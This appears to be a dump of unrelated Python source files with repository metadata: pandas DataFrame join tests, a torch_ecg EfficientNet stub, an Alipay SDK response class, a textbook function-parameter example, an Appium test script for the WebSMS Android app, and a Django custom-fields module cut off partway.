expected = DataFrame({"a": [1, 1], "b": [2, 2]}, index=df.index)
tm.assert_frame_equal(result, expected)
def test_join_index_mixed(self, join_type):
# no overlapping blocks
df1 = DataFrame(index=np.arange(10))
df1["bool"] = True
df1["string"] = "foo"
df2 = DataFrame(index=np.arange(5, 15))
df2["int"] = 1
df2["float"] = 1.0
joined = df1.join(df2, how=join_type)
expected = _join_by_hand(df1, df2, how=join_type)
tm.assert_frame_equal(joined, expected)
joined = df2.join(df1, how=join_type)
expected = _join_by_hand(df2, df1, how=join_type)
tm.assert_frame_equal(joined, expected)
def test_join_index_mixed_overlap(self):
df1 = DataFrame(
{"A": 1.0, "B": 2, "C": "foo", "D": True},
index=np.arange(10),
columns=["A", "B", "C", "D"],
)
assert df1["B"].dtype == np.int64
assert df1["D"].dtype == np.bool_
df2 = DataFrame(
{"A": 1.0, "B": 2, "C": "foo", "D": True},
index=np.arange(0, 10, 2),
columns=["A", "B", "C", "D"],
)
# overlap
joined = df1.join(df2, lsuffix="_one", rsuffix="_two")
expected_columns = [
"A_one",
"B_one",
"C_one",
"D_one",
"A_two",
"B_two",
"C_two",
"D_two",
]
df1.columns = expected_columns[:4]
df2.columns = expected_columns[4:]
expected = _join_by_hand(df1, df2)
tm.assert_frame_equal(joined, expected)
def test_join_empty_bug(self):
# generated an exception in 0.4.3
x = DataFrame()
x.join(DataFrame([3], index=[0], columns=["A"]), how="outer")
def test_join_unconsolidated(self):
# GH #331
a = DataFrame(randn(30, 2), columns=["a", "b"])
c = Series(randn(30))
a["c"] = c
d = DataFrame(randn(30, 1), columns=["q"])
# it works!
a.join(d)
d.join(a)
def test_join_multiindex(self):
index1 = MultiIndex.from_arrays(
[["a", "a", "a", "b", "b", "b"], [1, 2, 3, 1, 2, 3]],
names=["first", "second"],
)
index2 = MultiIndex.from_arrays(
[["b", "b", "b", "c", "c", "c"], [1, 2, 3, 1, 2, 3]],
names=["first", "second"],
)
df1 = DataFrame(data=np.random.randn(6), index=index1, columns=["var X"])
df2 = DataFrame(data=np.random.randn(6), index=index2, columns=["var Y"])
df1 = df1.sort_index(level=0)
df2 = df2.sort_index(level=0)
joined = df1.join(df2, how="outer")
ex_index = Index(index1.values).union(Index(index2.values))
expected = df1.reindex(ex_index).join(df2.reindex(ex_index))
expected.index.names = index1.names
tm.assert_frame_equal(joined, expected)
assert joined.index.names == index1.names
df1 = df1.sort_index(level=1)
df2 = df2.sort_index(level=1)
joined = df1.join(df2, how="outer").sort_index(level=0)
ex_index = Index(index1.values).union(Index(index2.values))
expected = df1.reindex(ex_index).join(df2.reindex(ex_index))
expected.index.names = index1.names
tm.assert_frame_equal(joined, expected)
assert joined.index.names == index1.names
def test_join_inner_multiindex(self):
key1 = ["bar", "bar", "bar", "foo", "foo", "baz", "baz", "qux", "qux", "snap"]
key2 = [
"two",
"one",
"three",
"one",
"two",
"one",
"two",
"two",
"three",
"one",
]
data = np.random.randn(len(key1))
data = DataFrame({"key1": key1, "key2": key2, "data": data})
index = MultiIndex(
levels=[["foo", "bar", "baz", "qux"], ["one", "two", "three"]],
codes=[[0, 0, 0, 1, 1, 2, 2, 3, 3, 3], [0, 1, 2, 0, 1, 1, 2, 0, 1, 2]],
names=["first", "second"],
)
to_join = DataFrame(
np.random.randn(10, 3), index=index, columns=["j_one", "j_two", "j_three"]
)
joined = data.join(to_join, on=["key1", "key2"], how="inner")
expected = merge(
data,
to_join.reset_index(),
left_on=["key1", "key2"],
right_on=["first", "second"],
how="inner",
sort=False,
)
expected2 = merge(
to_join,
data,
right_on=["key1", "key2"],
left_index=True,
how="inner",
sort=False,
)
tm.assert_frame_equal(joined, expected2.reindex_like(joined))
expected2 = merge(
to_join,
data,
right_on=["key1", "key2"],
left_index=True,
how="inner",
sort=False,
)
expected = expected.drop(["first", "second"], axis=1)
expected.index = joined.index
assert joined.index.is_monotonic
tm.assert_frame_equal(joined, expected)
# _assert_same_contents(expected, expected2.loc[:, expected.columns])
def test_join_hierarchical_mixed(self):
# GH 2024
df = DataFrame([(1, 2, 3), (4, 5, 6)], columns=["a", "b", "c"])
new_df = df.groupby(["a"]).agg({"b": [np.mean, np.sum]})
other_df = DataFrame([(1, 2, 3), (7, 10, 6)], columns=["a", "b", "d"])
other_df.set_index("a", inplace=True)
# GH 9455, 12219
with tm.assert_produces_warning(UserWarning):
result = merge(new_df, other_df, left_index=True, right_index=True)
assert ("b", "mean") in result
assert "b" in result
def test_join_float64_float32(self):
a = DataFrame(randn(10, 2), columns=["a", "b"], dtype=np.float64)
b = DataFrame(randn(10, 1), columns=["c"], dtype=np.float32)
joined = a.join(b)
assert joined.dtypes["a"] == "float64"
assert joined.dtypes["b"] == "float64"
assert joined.dtypes["c"] == "float32"
a = np.random.randint(0, 5, 100).astype("int64")
b = np.random.random(100).astype("float64")
c = np.random.random(100).astype("float32")
df = DataFrame({"a": a, "b": b, "c": c})
xpdf = DataFrame({"a": a, "b": b, "c": c})
s = DataFrame(np.random.random(5).astype("float32"), columns=["md"])
rs = df.merge(s, left_on="a", right_index=True)
assert rs.dtypes["a"] == "int64"
assert rs.dtypes["b"] == "float64"
assert rs.dtypes["c"] == "float32"
assert rs.dtypes["md"] == "float32"
xp = xpdf.merge(s, left_on="a", right_index=True)
tm.assert_frame_equal(rs, xp)
def test_join_many_non_unique_index(self):
df1 = DataFrame({"a": [1, 1], "b": [1, 1], "c": [10, 20]})
df2 = DataFrame({"a": [1, 1], "b": [1, 2], "d": [100, 200]})
df3 = DataFrame({"a": [1, 1], "b": [1, 2], "e": [1000, 2000]})
idf1 = df1.set_index(["a", "b"])
idf2 = df2.set_index(["a", "b"])
idf3 = df3.set_index(["a", "b"])
result = idf1.join([idf2, idf3], how="outer")
df_partially_merged = merge(df1, df2, on=["a", "b"], how="outer")
expected = merge(df_partially_merged, df3, on=["a", "b"], how="outer")
result = result.reset_index()
expected = expected[result.columns]
expected["a"] = expected.a.astype("int64")
expected["b"] = expected.b.astype("int64")
tm.assert_frame_equal(result, expected)
df1 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 1], "c": [10, 20, 30]})
df2 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 2], "d": [100, 200, 300]})
df3 = DataFrame({"a": [1, 1, 1], "b": [1, 1, 2], "e": [1000, 2000, 3000]})
idf1 = df1.set_index(["a", "b"])
idf2 = df2.set_index(["a", "b"])
idf3 = df3.set_index(["a", "b"])
result = idf1.join([idf2, idf3], how="inner")
df_partially_merged = merge(df1, df2, on=["a", "b"], how="inner")
expected = merge(df_partially_merged, df3, on=["a", "b"], how="inner")
result = result.reset_index()
tm.assert_frame_equal(result, expected.loc[:, result.columns])
# GH 11519
df = DataFrame(
{
"A": ["foo", "bar", "foo", "bar", "foo", "bar", "foo", "foo"],
"B": ["one", "one", "two", "three", "two", "two", "one", "three"],
"C": np.random.randn(8),
"D": np.random.randn(8),
}
)
s = Series(
np.repeat(np.arange(8), 2), index=np.repeat(np.arange(8), 2), name="TEST"
)
inner = df.join(s, how="inner")
outer = df.join(s, how="outer")
left = df.join(s, how="left")
right = df.join(s, how="right")
tm.assert_frame_equal(inner, outer)
tm.assert_frame_equal(inner, left)
tm.assert_frame_equal(inner, right)
def test_join_sort(self):
left = DataFrame({"key": ["foo", "bar", "baz", "foo"], "value": [1, 2, 3, 4]})
right = DataFrame({"value2": ["a", "b", "c"]}, index=["bar", "baz", "foo"])
joined = left.join(right, on="key", sort=True)
expected = DataFrame(
{
"key": ["bar", "baz", "foo", "foo"],
"value": [2, 3, 1, 4],
"value2": ["a", "b", "c", "c"],
},
index=[1, 2, 0, 3],
)
tm.assert_frame_equal(joined, expected)
# smoke test
joined = left.join(right, on="key", sort=False)
tm.assert_index_equal(joined.index, pd.Index(list(range(4))))
def test_join_mixed_non_unique_index(self):
# GH 12814, unorderable types in py3 with a non-unique index
df1 = DataFrame({"a": [1, 2, 3, 4]}, index=[1, 2, 3, "a"])
df2 = DataFrame({"b": [5, 6, 7, 8]}, index=[1, 3, 3, 4])
result = df1.join(df2)
expected = DataFrame(
{"a": [1, 2, 3, 3, 4], "b": [5, np.nan, 6, 7, np.nan]},
index=[1, 2, 3, 3, "a"],
)
tm.assert_frame_equal(result, expected)
df3 = DataFrame({"a": [1, 2, 3, 4]}, index=[1, 2, 2, "a"])
df4 = DataFrame({"b": [5, 6, 7, 8]}, index=[1, 2, 3, 4])
result = df3.join(df4)
expected = DataFrame(
{"a": [1, 2, 3, 4], "b": [5, 6, 6, np.nan]}, index=[1, 2, 2, "a"]
)
tm.assert_frame_equal(result, expected)
def test_join_non_unique_period_index(self):
# GH #16871
index = pd.period_range("2016-01-01", periods=16, freq="M")
df = DataFrame(list(range(len(index))), index=index, columns=["pnum"])
df2 = concat([df, df])
result = df.join(df2, how="inner", rsuffix="_df2")
expected = DataFrame(
np.tile(np.arange(16, dtype=np.int64).repeat(2).reshape(-1, 1), 2),
columns=["pnum", "pnum_df2"],
index=df2.sort_index().index,
)
tm.assert_frame_equal(result, expected)
def test_mixed_type_join_with_suffix(self):
# GH #916
df = DataFrame(np.random.randn(20, 6), columns=["a", "b", "c", "d", "e", "f"])
df.insert(0, "id", 0)
df.insert(5, "dt", "foo")
grouped = df.groupby("id")
mn = grouped.mean()
cn = grouped.count()
# it works!
mn.join(cn, rsuffix="_right")
def test_join_many(self):
df = DataFrame(np.random.randn(10, 6), columns=list("abcdef"))
df_list = [df[["a", "b"]], df[["c", "d"]], df[["e", "f"]]]
joined = df_list[0].join(df_list[1:])
tm.assert_frame_equal(joined, df)
df_list = [df[["a", "b"]][:-2], df[["c", "d"]][2:], df[["e", "f"]][1:9]]
def _check_diff_index(df_list, result, exp_index):
reindexed = [x.reindex(exp_index) for x in df_list]
expected = reindexed[0].join(reindexed[1:])
tm.assert_frame_equal(result, expected)
# different join types
joined = df_list[0].join(df_list[1:], how="outer")
_check_diff_index(df_list, joined, df.index)
joined = df_list[0].join(df_list[1:])
_check_diff_index(df_list, joined, df_list[0].index)
joined = df_list[0].join(df_list[1:], how="inner")
_check_diff_index(df_list, joined, df.index[2:8])
msg = "Joining multiple DataFrames only supported for joining on index"
with pytest.raises(ValueError, match=msg):
df_list[0].join(df_list[1:], on="a")
def test_join_many_mixed(self):
df = DataFrame(np.random.randn(8, 4), columns=["A", "B", "C", "D"])
df["key"] = ["foo", "bar"] * 4
df1 = df.loc[:, ["A", "B"]]
df2 = df.loc[:, ["C", "D"]]
df3 = df.loc[:, ["key"]]
result = df1.join([df2, df3])
tm.assert_frame_equal(result, df)
def test_join_dups(self):
# joining dups
df = concat(
[
DataFrame(np.random.randn(10, 4), columns=["A", "A", "B", "B"]),
DataFrame(
np.random.randint(0, 10, size=20).reshape(10, 2), columns=["A", "C"]
),
],
axis=1,
)
expected = concat([df, df], axis=1)
result = df.join(df, rsuffix="_2")
result.columns = expected.columns
tm.assert_frame_equal(result, expected)
# GH 4975, invalid join on dups
w = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
x = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
y = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
z = DataFrame(np.random.randn(4, 2), columns=["x", "y"])
dta = x.merge(y, left_index=True, right_index=True).merge(
z, left_index=True, right_index=True, how="outer"
)
dta = dta.merge(w, left_index=True, right_index=True)
expected = concat([x, y, z, w], axis=1)
expected.columns = ["x_x", "y_x", "x_y", "y_y", "x_x", "y_x", "x_y", "y_y"]
tm.assert_frame_equal(dta, expected)
def test_join_multi_to_multi(self, join_type):
# GH 20475
leftindex = MultiIndex.from_product(
[list("abc"), list("xy"), [1, 2]], names=["abc", "xy", "num"]
)
left = DataFrame({"v1": range(12)}, index=leftindex)
rightindex = MultiIndex.from_product(
[list("abc"), list("xy")], names=["abc", "xy"]
)
right = DataFrame({"v2": [100 * i for i in range(1, 7)]}, index=rightindex)
result = left.join(right, on=["abc", "xy"], how=join_type)
expected = (
left.reset_index()
.merge(right.reset_index(), on=["abc", "xy"], how=join_type)
.set_index(["abc", "xy", "num"])
)
tm.assert_frame_equal(expected, result)
msg = r'len\(left_on\) must equal the number of levels in the index of "right"'
with pytest.raises(ValueError, match=msg):
left.join(right, on="xy", how=join_type)
with pytest.raises(ValueError, match=msg):
right.join(left, on=["abc", "xy"], how=join_type)
def test_join_on_tz_aware_datetimeindex(self):
# GH 23931, 26335
df1 = pd.DataFrame(
{
"date": pd.date_range(
start="2018-01-01", periods=5, tz="America/Chicago"
),
"vals": list("abcde"),
}
)
df2 = pd.DataFrame(
{
"date": pd.date_range(
start="2018-01-03", periods=5, tz="America/Chicago"
),
"vals_2": list("tuvwx"),
}
)
result = df1.join(df2.set_index("date"), on="date")
expected = df1.copy()
expected["vals_2"] = pd.Series([np.nan] * 2 + list("tuv"), dtype=object)
tm.assert_frame_equal(result, expected)
def test_join_datetime_string(self):
# GH 5647
dfa = DataFrame(
[
["2012-08-02", "L", 10],
["2012-08-02", "J", 15],
["2013-04-06", "L", 20],
["2013-04-06", "J", 25],
],
columns=["x", "y", "a"],
)
dfa["x"] = pd.to_datetime(dfa["x"])
dfb = DataFrame(
[["2012-08-02", "J", 1], ["2013-04-06", "L", 2]],
columns=["x", "y", "z"],
index=[2, 4],
)
dfb["x"] = pd.to_datetime(dfb["x"])
result = dfb.join(dfa.set_index(["x", "y"]), on=["x", "y"])
expected = DataFrame(
[
[pd.Timestamp("2012-08-02 00:00:00"), "J", 1, 15],
[pd.Timestamp("2013-04-06 00:00:00"), "L", 2, 20],
],
index=[2, 4],
columns=["x", "y", "z", "a"],
)
tm.assert_frame_equal(result, expected)
def _check_join(left, right, result, join_col, how="left", lsuffix="_x", rsuffix="_y"):
# some smoke tests
for c in join_col:
assert result[c].notna().all()
left_grouped = left.groupby(join_col)
right_grouped = right.groupby(join_col)
for group_key, group in result.groupby(join_col):
l_joined = _restrict_to_columns(group, left.columns, lsuffix)
r_joined = _restrict_to_columns(group, right.columns, rsuffix)
try:
lgroup = left_grouped.get_group(group_key)
except KeyError as err:
if how in ("left", "inner"):
raise AssertionError(
f"key {group_key} should not have been in the join"
) from err
_assert_all_na(l_joined, left.columns, join_col)
else:
_assert_same_contents(l_joined, lgroup)
try:
rgroup = right_grouped.get_group(group_key)
except KeyError as err:
if how in ("right", "inner"):
raise AssertionError(
f"key {group_key} should not have been in the join"
) from err
_assert_all_na(r_joined, right.columns, join_col)
else:
_assert_same_contents(r_joined, rgroup)
def _restrict_to_columns(group, columns, suffix):
found = [
c for c in group.columns if c in columns or c.replace(suffix, "") in columns
]
# filter
group = group.loc[:, found]
# get rid of suffixes, if any
group = group.rename(columns=lambda x: x.replace(suffix, ""))
# put in the right order...
group = group.loc[:, columns]
return group
def _assert_same_contents(join_chunk, source):
NA_SENTINEL = -1234567 # drop_duplicates not so NA-friendly...
jvalues = join_chunk.fillna(NA_SENTINEL).drop_duplicates().values
svalues = source.fillna(NA_SENTINEL).drop_duplicates().values
rows = {tuple(row) for row in jvalues}
assert len(rows) == len(source)
assert all(tuple(row) in rows for row in svalues)
def _assert_all_na(join_chunk, source_columns, join_col):
for c in source_columns:
if c in join_col:
continue
assert join_chunk[c].isna().all()
def _join_by_hand(a, b, how="left"):
join_index = a.index.join(b.index, how=how)
a_re = a.reindex(join_index)
b_re = b.reindex(join_index)
result_columns = a.columns.append(b.columns)
for col, s in b_re.items():
a_re[col] = s
return a_re.reindex(columns=result_columns)
| [
"kd619@ic.ac.uk"
] | kd619@ic.ac.uk |
b0b6eab9b83d55d521265d739f7a459d8fef349c | 860c31e414c4c280b70ec0872042d715a2d56978 | /torch_ecg/models/cnn/efficientnet.py | ee0521f6eb097623f4385fdca0f8d28cfb057f82 | [
"MIT"
] | permissive | DeepPSP/torch_ecg | 255e49ff436e13044a1f049141f982680e56970e | a40c65f4fefa83ba7d3d184072a4c05627b7e226 | refs/heads/master | 2023-09-01T06:47:17.153216 | 2023-08-31T18:00:47 | 2023-08-31T18:00:47 | 298,482,237 | 111 | 16 | MIT | 2023-08-21T11:25:07 | 2020-09-25T06:03:17 | Python | UTF-8 | Python | false | false | 2,317 | py | """
EfficientNet.
References
----------
1. Tan, M., & Le, Q. V. (2019). Efficientnet: Rethinking model scaling for convolutional neural networks. arXiv preprint arXiv:1905.11946.
2. Tan, M., & Le, Q. V. (2021). Efficientnetv2: Smaller models and faster training. arXiv preprint arXiv:2104.00298.
3. https://github.com/google/automl
"""
from typing import List
from torch import nn
from ...models._nets import ( # noqa: F401
Conv_Bn_Activation,
DownSample,
GlobalContextBlock,
NonLocalBlock,
SEBlock,
)
from ...utils import SizeMixin, CitationMixin
__all__ = [
"EfficientNet",
]
class EfficientNet(nn.Module, SizeMixin, CitationMixin):
"""
Reference
---------
1. Tan, M., & Le, Q. V. (2019). Efficientnet: Rethinking model scaling for convolutional neural networks. arXiv preprint arXiv:1905.11946.
2. https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/model.py
3. https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/efficientnet.py
3. https://github.com/google/automl
"""
__name__ = "EfficientNet"
def __init__(self, in_channels: int, **config) -> None:
super().__init__()
raise NotImplementedError
def forward(self):
raise NotImplementedError
def compute_output_shape(self):
raise NotImplementedError
@property
def doi(self) -> List[str]:
return list(set(self.config.get("doi", []) + ["10.48550/ARXIV.1905.11946"]))
class EfficientNetV2(nn.Module, SizeMixin):
"""
Reference
---------
1. Tan, M., & Le, Q. V. (2021). Efficientnetv2: Smaller models and faster training. arXiv preprint arXiv:2104.00298.
2. https://github.com/d-li14/efficientnetv2.pytorch/blob/main/effnetv2.py
3. https://github.com/lukemelas/EfficientNet-PyTorch/blob/master/efficientnet_pytorch/model.py
4. https://github.com/rwightman/pytorch-image-models/blob/master/timm/models/efficientnet.py
5. https://github.com/google/automl
"""
__name__ = "EfficientNetV2"
def __init__(self, in_channels: int, **config) -> None:
super().__init__()
raise NotImplementedError
def forward(self):
raise NotImplementedError
def compute_output_shape(self):
raise NotImplementedError
| [
"wenh06@gmail.com"
] | wenh06@gmail.com |
02850738d65612e07d146e31e9908775f0fcd8a5 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayEbppInstserviceDeductSignResponse.py | c249afbff2e18df95caf317c18a1120b1533b56f | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 1,026 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayEbppInstserviceDeductSignResponse(AlipayResponse):
def __init__(self):
super(AlipayEbppInstserviceDeductSignResponse, self).__init__()
self._error_code = None
self._process_id = None
@property
def error_code(self):
return self._error_code
@error_code.setter
def error_code(self, value):
self._error_code = value
@property
def process_id(self):
return self._process_id
@process_id.setter
def process_id(self, value):
self._process_id = value
def parse_response_content(self, response_content):
response = super(AlipayEbppInstserviceDeductSignResponse, self).parse_response_content(response_content)
if 'error_code' in response:
self.error_code = response['error_code']
if 'process_id' in response:
self.process_id = response['process_id']
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
b48ba99ef0bcc9fec5618036a29b6dce473fd246 | f22d31484a12d001826c1775a6f2d245a720fce8 | /Introdução à Programação com Python/Do autor/Códigi fonte e listagem/listagem/capitulo 08/08.26 - Funções como parâmetro.py | fda15eae9a584a943ce075871ac6c0de07ce0b35 | [] | no_license | eduardoprograma/linguagem_Python | 9eb55f0a5a432a986e047b091eb7ed7152b7da67 | 942aba9146800fc33bbea98778467f837396cb93 | refs/heads/master | 2021-07-07T20:48:37.673101 | 2020-07-31T21:24:17 | 2020-07-31T21:24:17 | 159,852,510 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | py | ##############################################################################
# Parte do livro Introdução à Programação com Python
# Autor: Nilo Ney Coutinho Menezes
# Editora Novatec (c) 2010-2017
# Primeira edição - Novembro/2010 - ISBN 978-85-7522-250-8
# Primeira reimpressão - Outubro/2011
# Segunda reimpressão - Novembro/2012
# Terceira reimpressão - Agosto/2013
# Segunda edição - Junho/2014 - ISBN 978-85-7522-408-3
# Primeira reimpressão - Segunda edição - Maio/2015
# Segunda reimpressão - Segunda edição - Janeiro/2016
# Terceira reimpressão - Segunda edição - Junho/2016
# Quarta reimpressão - Segunda edição - Março/2017
#
# Site: http://python.nilo.pro.br/
#
# Arquivo: listagem\capitulo 08\08.26 - Funções como parâmetro.py
##############################################################################
def soma(a,b):
return a+b
def subtração(a,b):
return a-b
def imprime(a,b, foper):
print(foper(a,b))
imprime(5,4, soma)
imprime(10,1, subtração)
| [
"eduardo.candido@fatec.sp.gov.br"
] | eduardo.candido@fatec.sp.gov.br |
cf444680091fffcf6b4f9fadb2a2ffe558bc5918 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/websms/testcase/firstcases/testcase13_003.py | 0e57a4f0d4f2d8752508b328d7bed313c340ee1a | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,362 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'de.ub0r.android.websms',
'appActivity' : 'de.ub0r.android.websms.WebSMS',
'resetKeyboard' : True,
'androidCoverage' : 'de.ub0r.android.websms/de.ub0r.android.websms.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1) :
for temp in elements :
if temp.get_attribute("enabled") == "true" :
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.55, 0.5, 0.2)
else :
return element
for i in range(0, 4, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1):
for temp in elements:
if temp.get_attribute("enabled") == "true":
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.2, 0.5, 0.55)
else :
return element
return
def scrollToClickElement(driver, str) :
element = scrollToFindElement(driver, str)
if element is None :
return
else :
element.click()
def clickInList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
element.click()
else :
if checkWindow(driver) :
driver.press_keycode(4)
def clickOnCheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
def typeText(driver, value) :
element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
element.clear()
element.send_keys(value)
enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
if (enterelement is None) :
if checkWindow(driver):
driver.press_keycode(4)
else :
enterelement.click()
def checkWindow(driver) :
dsize = driver.get_window_size()
nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
if dsize['height'] > nsize['height']:
return True
else :
return False
def testingSeekBar(driver, str, value):
try :
if(not checkWindow(driver)) :
element = seekForNearestSeekBar(driver, str)
else :
element = driver.find_element_by_class_name("android.widget.SeekBar")
if (None != element):
settingSeekBar(driver, element, value)
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
except NoSuchElementException:
time.sleep(1)
def seekForNearestSeekBar(driver, str):
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_class_name("android.widget.SeekBar")
return innere
break
except NoSuchElementException:
continue
def settingSeekBar(driver, element, value) :
x = element.rect.get("x")
y = element.rect.get("y")
width = element.rect.get("width")
height = element.rect.get("height")
TouchAction(driver).press(None, x + 10, y + height/2).move_to(None, x + width * value,y + height/2).release().perform()
y = value
def clickInMultiList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
nowvalue = element.get_attribute("checked")
if (nowvalue != "true") :
element.click()
if checkWindow(driver) :
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
# testcase13_003
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"de.ub0r.android.websms:id/item_send\").className(\"android.widget.TextView\")")
TouchAction(driver).long_press(element).release().perform()
driver.press_keycode(82)
element = getElememtBack(driver, "new UiSelector().text(\"Donate/remove ads\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"13_003\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'de.ub0r.android.websms'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
f1abe9b49397d2ab709e03ce4589f5b19498c455 | 3b574a8d1f9cd0bde99f2e94c3c6e7b59ab46ee3 | /project/apps/core/fields.py | ac9c8184ec24e84bb7848ffeecbfdcb6a207b9c7 | [
"BSD-2-Clause"
] | permissive | barberscore/archive-api | 7ac908d2754f6fa5c387bf6e49c257424887f9b3 | d6cf8867ad60c6ae334a555881c06c71069fa12c | refs/heads/master | 2023-02-24T19:45:23.973475 | 2022-01-26T14:35:10 | 2022-01-26T14:35:10 | 202,747,844 | 0 | 0 | BSD-2-Clause | 2023-02-08T00:52:56 | 2019-08-16T15:01:15 | Python | UTF-8 | Python | false | false | 4,383 | py | import os
import string
from datetime import date
import phonenumbers
import six
import pytz
from django.db.models import EmailField, CharField, DateField
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from django.utils.deconstruct import deconstructible
from rest_framework_json_api import serializers
from django.contrib.postgres.fields import ArrayField
from django.forms import MultipleChoiceField
@deconstructible
class UploadPath(object):
def __init__(self, name):
self.name = name
def __call__(self, instance, filename):
return os.path.join(
instance._meta.app_label,
instance._meta.model_name,
self.name,
str(instance.id),
)
class LowerEmailField(EmailField):
def get_prep_value(self, value):
value = super().get_prep_value(value)
if value is not None:
value = value.lower()
return value
class DivisionsField(ArrayField):
def formfield(self, **kwargs):
defaults = {
'form_class': MultipleChoiceField,
'choices': self.base_field.choices,
}
defaults.update(kwargs)
# Skip our parent's formfield implementation completely as we don't
# care for it.
# pylint:disable=bad-super-call
return super(ArrayField, self).formfield(**defaults)
def to_python(self, value):
res = super().to_python(value)
if isinstance(res, list):
value = [self.base_field.to_python(val) for val in res]
return value
class TimezoneField(serializers.Field):
def to_representation(self, obj):
return six.text_type(obj)
def to_internal_value(self, data):
try:
return pytz.timezone(str(data))
except pytz.exceptions.UnknownTimeZoneError:
raise ValidationError('Unknown timezone')
class ValidatedPhoneField(CharField):
def from_db_value(self, value, expression, connection):
try:
value = phonenumbers.parse(value, 'US')
except phonenumbers.NumberParseException:
return ""
return phonenumbers.format_number(value, phonenumbers.PhoneNumberFormat.E164)
class LowerEmailField(EmailField):
